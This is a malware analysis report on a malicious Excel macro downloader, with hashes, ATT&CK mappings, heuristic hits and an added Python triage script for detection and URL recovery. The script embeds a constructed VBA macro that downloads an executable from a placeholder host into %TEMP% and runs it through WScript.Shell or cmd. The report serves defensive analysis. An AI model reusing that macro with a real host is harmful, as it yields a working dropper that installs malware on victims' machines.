Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 410512e7b674fd30…

MALICIOUS

Office (OLE) / .XLS

Size: 106.0 KB
Created: 2023-02-16 07:32:17
Authoring application: Microsoft Excel
First seen: 2023-02-22

MD5: f7df1ff7b85d9de16d95933b8031e883
SHA-1: 886d69306b66b2247d1740638c20881d0518716e
SHA-256: 410512e7b674fd30371d8e8d6f57d65761e054bc85fd0635828526428a92b550

Risk Score: 348

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.003 Windows Command Shell
  • T1105 Ingress Tool Transfer

The sample is an Excel workbook containing VBA macros. The critical heuristics fire on a URLDownloadToFile declaration together with WScript.Shell and Shell() calls, the standard combination for a macro downloader: fetch a second-stage payload over HTTP(S), write it to disk, then execute it through the Windows Script Host or the command shell. The Environ() hit shows the macro reads an environment variable, which downloaders commonly use to build a writable drop path such as %TEMP%. The download URL is obfuscated in the macro source and was not recovered statically, so the second-stage payload is unknown; the URLDownloadToFile import by itself is nonetheless a strong indicator of download-and-execute behaviour. No specific malware family could be identified. Confirming the download URL and the payload requires detonating the sample in a sandbox or emulating the macro.

Heuristics (8)

  • SC_STR_URLDOWNLOAD   critical  Reference to URLDownloadToFile API
  • OLE_VBA_SHELL        critical  Shell() call in VBA
  • OLE_VBA_WSCRIPT      critical  WScript.Shell usage
  • OLE_VBA_DOWNLOAD     critical  URLDownloadToFile in VBA
  • SC_STR_WSCRIPT       high      Reference to Windows Script Host
  • OLE_VBA_CREATEOBJ    high      CreateObject call
  • OLE_VBA_MACROS       medium    VBA macros detected (document contains VBA macro code)
  • OLE_VBA_ENVIRON      low       Environ() call (env variable access)
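As an added example (not the report's own tooling, and not the analysed macro), the script below applies the eight heuristics above, with the report's heuristic IDs, to a decoded VBA source and attempts the one recovery step the summary mentions: undoing a URL split across string literals. The macro text embedded in it is constructed to exercise every heuristic (its URL points at the reserved example.invalid domain); the severity weights are illustrative assumptions and not the vendor's risk-score scale. Real analysis would feed the SC_STR_* string heuristics the bytes of the OLE container and the OLE_VBA_* heuristics the olevba-decoded source; here both are the same text.

```python
"""Heuristic triage of a decoded VBA macro (added example; the macro is constructed)."""
import hashlib
import re
from dataclasses import dataclass

# CONSTRUCTED stand-in for a decoded macros.bas. It is not the analysed sample;
# it just exercises each heuristic, with the URL split over literals and Chr().
SAMPLE_VBA = r'''Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Sub Auto_Open()
    Dim u As String, p As String
    u = "ht" & "tp://" & Chr(101) & "xample.invalid/" & "p.exe"   ' obfuscated URL
    p = Environ("TEMP") & "\up.exe"
    If URLDownloadToFile(0, u, p, 0, 0) = 0 Then
        CreateObject("WScript.Shell").Run p, 0, False
    Else
        Shell "cmd /c start " & p, vbHide
    End If
End Sub
'''

# Illustrative weights (assumption): NOT the vendor's risk-score scale.
SEVERITY_WEIGHT = {"critical": 40, "high": 20, "medium": 10, "low": 5}

# (id, severity, description, scope, regex, flags). "raw" patterns are case-sensitive
# byte-string hits; "vba" patterns run on decoded source and ignore case, as VBA does.
HEURISTICS = [
    ("SC_STR_URLDOWNLOAD", "critical", "Reference to URLDownloadToFile API", "raw", r"URLDownloadToFile", 0),
    # Shell may be called as a statement without parentheses; exclude WScript.Shell via the lookbehind.
    ("OLE_VBA_SHELL", "critical", "Shell() call in VBA", "vba", r"(?<!\.)\bShell\b", re.I),
    ("OLE_VBA_WSCRIPT", "critical", "WScript.Shell usage", "vba", r"WScript\.Shell", re.I),
    ("OLE_VBA_DOWNLOAD", "critical", "URLDownloadToFile in VBA", "vba", r"\bURLDownloadToFile[AW]?\b", re.I),
    ("SC_STR_WSCRIPT", "high", "Reference to Windows Script Host", "raw", r"WScript", 0),
    ("OLE_VBA_CREATEOBJ", "high", "CreateObject call", "vba", r"\bCreateObject\s*\(", re.I),
    ("OLE_VBA_MACROS", "medium", "Document contains VBA macro code", "vba",
     r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\b", re.I | re.M),
    ("OLE_VBA_ENVIRON", "low", "Environ() call (env variable access)", "vba", r"\bEnviron\$?\s*\(", re.I),
]


@dataclass(frozen=True)
class Hit:
    hid: str
    severity: str
    description: str
    evidence: str


def scan(raw: bytes, vba_source: str) -> list[Hit]:
    """Run every heuristic on its scope and return the hits in table order."""
    raw_text = raw.decode("latin-1")  # byte-preserving decode so regexes can run on container bytes
    hits = []
    for hid, sev, desc, scope, pattern, flags in HEURISTICS:
        m = re.search(pattern, raw_text if scope == "raw" else vba_source, flags)
        if m:
            hits.append(Hit(hid, sev, desc, m.group(0)))
    return hits


def risk_score(hits: list[Hit]) -> int:
    return sum(SEVERITY_WEIGHT[h.severity] for h in hits)


def _chr_to_literal(m: re.Match) -> str:
    n = int(m.group(1))
    # Fold printable ASCII only; a quote (34) would need VBA's "" escaping, so leave it as is.
    return '"%s"' % chr(n) if 32 <= n < 127 and n != 34 else m.group(0)


_CONCAT = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')  # does not handle "" escapes inside literals
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)


def fold_string_literals(line: str) -> str:
    """Resolve Chr(n) and join adjacent literals: "ht" & "tp" -> "http"."""
    line = re.sub(r"\bChr\$?\((\d+)\)", _chr_to_literal, line, flags=re.I)
    prev = None
    while prev != line:  # repeat until no more "a" & "b" pairs remain
        prev, line = line, _CONCAT.sub(r'"\1\2"', line)
    return line


def extract_urls(vba_source: str) -> list[str]:
    """URLs visible after literal folding; runtime-built strings are out of reach here."""
    urls = []
    for line in vba_source.splitlines():
        urls += URL_RE.findall(fold_string_literals(line))
    return urls


def artifact_sha256(vba_source: str) -> str:
    """Hash of the decoded source, as the artifact table records for macros.bas."""
    return hashlib.sha256(vba_source.encode()).hexdigest()


if __name__ == "__main__":
    found = scan(SAMPLE_VBA.encode(), SAMPLE_VBA)
    for h in found:
        print(f"{h.severity:8} {h.hid:20} {h.description}  [{h.evidence}]")
    print("risk score:", risk_score(found))
    print("recovered URLs:", extract_urls(SAMPLE_VBA))
    print("macro sha256:", artifact_sha256(SAMPLE_VBA))
```

The URL recovery only folds literal concatenation and Chr(); it will not undo arithmetic on character codes, Replace()/StrReverse() tricks or strings decoded at runtime, which is why the summary above treats the URLDownloadToFile import rather than a recovered URL as the decisive indicator. Confirming the payload still requires dynamic analysis.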

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename  macros.bas
SHA-256   7f59bf905f2f78fa620b7eb0d7eb19ede3bd06a8d9339021c43d4c9d535a23cf
Kind      vba-macro
Source    oletools.olevba.extract_macros (decoded VBA source)
Size      2448 bytes